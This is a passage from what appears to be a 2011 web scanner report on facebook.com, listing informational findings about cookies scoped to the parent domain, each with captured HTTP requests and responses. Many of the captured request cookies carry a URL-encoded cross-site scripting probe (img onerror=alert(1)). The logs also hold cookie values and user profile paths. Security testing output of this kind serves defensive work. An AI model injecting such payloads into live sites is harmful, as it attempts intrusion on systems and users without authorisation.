Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; lsd=zTWKd; datr=ituyTcnawc6q7VcE0gibPCo2; act=1304613672018%2F1; L=2; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F12; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F1242845259e76bc%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eb0233c9330b; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2F1242845259

Response

10.81. http://www.facebook.com/people/Bucky-Jordan%20/100000824820783 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/people/Bucky-Jordan%20/100000824820783

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /people/Bucky-Jordan%20/100000824820783 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
X-Purpose: : preview
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; lsd=zTWKd; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; wd=907x1007

Response

HTTP/1.1 301 Moved Permanently
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Location: http://www.facebook.com/people/Bucky-Jordan/100000824820783
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.104.59
X-Cnection: close
Date: Thu, 05 May 2011 11:39:24 GMT
Content-Length: 0

10.82. http://www.facebook.com/people/Bucky-Jordan/100000824820783 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/people/Bucky-Jordan/100000824820783

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

lsd=bYeMg; path=/; domain=.facebook.com
reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; path=/; domain=.facebook.com
reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; path=/; domain=.facebook.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /people/Bucky-Jordan/100000824820783 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: lsd=bYeMg; path=/; domain=.facebook.com
Set-Cookie: reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; path=/; domain=.facebook.com
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; path=/; domain=.facebook.com
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.36.233.110
X-Cnection: close
Date: Thu, 05 May 2011 02:50:59 GMT
Content-Length: 56884

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://ogp.me/ns#" xml:lang="en" l
...[SNIP]...

10.83. http://www.facebook.com/policy.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/policy.php

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

_e_nXwy_1=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /policy.php HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/r.php?profile_id=100000824820783&next=http%3A%2F%2Fwww.facebook.com%2Fprofile.php%3Fid%3D100000824820783
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; lsd=zTWKd; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; act=1304613620616%2F2; _e_nXwy_1=%5B%22nXwy%22%2C1304613620617%2C%22act%22%2C1304613620616%2C2%2C%22http%3A%2F%2Fwww.facebook.com%2Fpolicy.php%22%2C%22a%22%2C%22click%22%2C%22-%22%2C%22r%22%2C%22%2Fr.php%3Fprofile_id%3D100000824820783%26next%3Dhttp%253A%252F%252Fwww.facebook.com%252Fprofile.php%253Fid%253D100000824820783%22%2C%7B%22ft%22%3A%7B%7D%2C%22gt%22%3A%7B%7D%7D%2C657%2C204%2C12%2C981%2C16%5D

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: _e_nXwy_1=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.147.57
X-Cnection: close
Date: Thu, 05 May 2011 11:43:31 GMT
Content-Length: 58371

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

10.84. http://www.facebook.com/privacy/explanation.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/privacy/explanation.php

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fprivacy%2Fexplanation.php; path=/; domain=.facebook.com
wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /privacy/explanation.php HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

10.85. http://www.facebook.com/profile.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/profile.php

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /profile.php?id=1708077046 HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 301 Moved Permanently
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Location: http://www.facebook.com/people/Roy-Chastain/1708077046
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.152.75
Connection: close
Date: Thu, 05 May 2011 11:42:14 GMT
Content-Length: 0

10.86. http://www.facebook.com/r.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/r.php

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

10.87. http://www.facebook.com/recover.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/recover.php

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /recover.php HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 302 Found
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Location: https://www.facebook.com/recover.php
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.36.155.107
X-Cnection: close
Date: Thu, 05 May 2011 11:42:51 GMT
Content-Length: 0
Connection: close

10.88. http://www.facebook.com/robynalys previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/robynalys

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Frobynalys; path=/; domain=.facebook.com
wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /robynalys HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

10.89. http://www.facebook.com/share.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/share.php

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fshare.php; path=/; domain=.facebook.com
wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /share.php HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=xCqlG; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=907x1007; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS;

Response

10.90. http://www.facebook.com/sharer.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/sharer.php

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fsharer.php; path=/; domain=.facebook.com
wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /sharer.php HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=xCqlG; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=907x1007; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS;

Response

10.91. http://www.facebook.com/skdarealist previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/skdarealist

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fskdarealist; path=/; domain=.facebook.com
wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /skdarealist HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

10.92. http://www.facebook.com/sportingnews previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/sportingnews

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /sportingnews HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

10.93. http://www.facebook.com/stefanoboscolomarchi previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/stefanoboscolomarchi

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fstefanoboscolomarchi; path=/; domain=.facebook.com
wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /stefanoboscolomarchi HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

10.94. http://www.facebook.com/techcrunch previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/techcrunch

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /techcrunch HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

10.95. http://www.facebook.com/terms.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/terms.php

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /terms.php HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=xCqlG; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=907x1007; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS;

Response

10.96. http://www.facebook.com/theteebers previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/theteebers

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Ftheteebers; path=/; domain=.facebook.com
wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /theteebers HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

10.97. http://www.facebook.com/wmoppert previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/wmoppert

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fwmoppert; path=/; domain=.facebook.com
wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /wmoppert HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

10.98. https://www.facebook.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.facebook.com
Path:	/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

reg_fb_ref=https%3A%2F%2Fwww.facebook.com%2F; path=/; domain=.facebook.com
wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

10.99. https://www.facebook.com/ajax/intl/language_dialog.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.facebook.com
Path:	/ajax/intl/language_dialog.php

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

10.100. https://www.facebook.com/h02332 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.facebook.com
Path:	/h02332

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

lsd=bnJmV; path=/; domain=.facebook.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: lsd=bnJmV; path=/; domain=.facebook.com
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.166.47
X-Cnection: close
Date: Thu, 05 May 2011 12:37:53 GMT
Content-Length: 14457

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

10.101. https://www.facebook.com/h02332 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.facebook.com
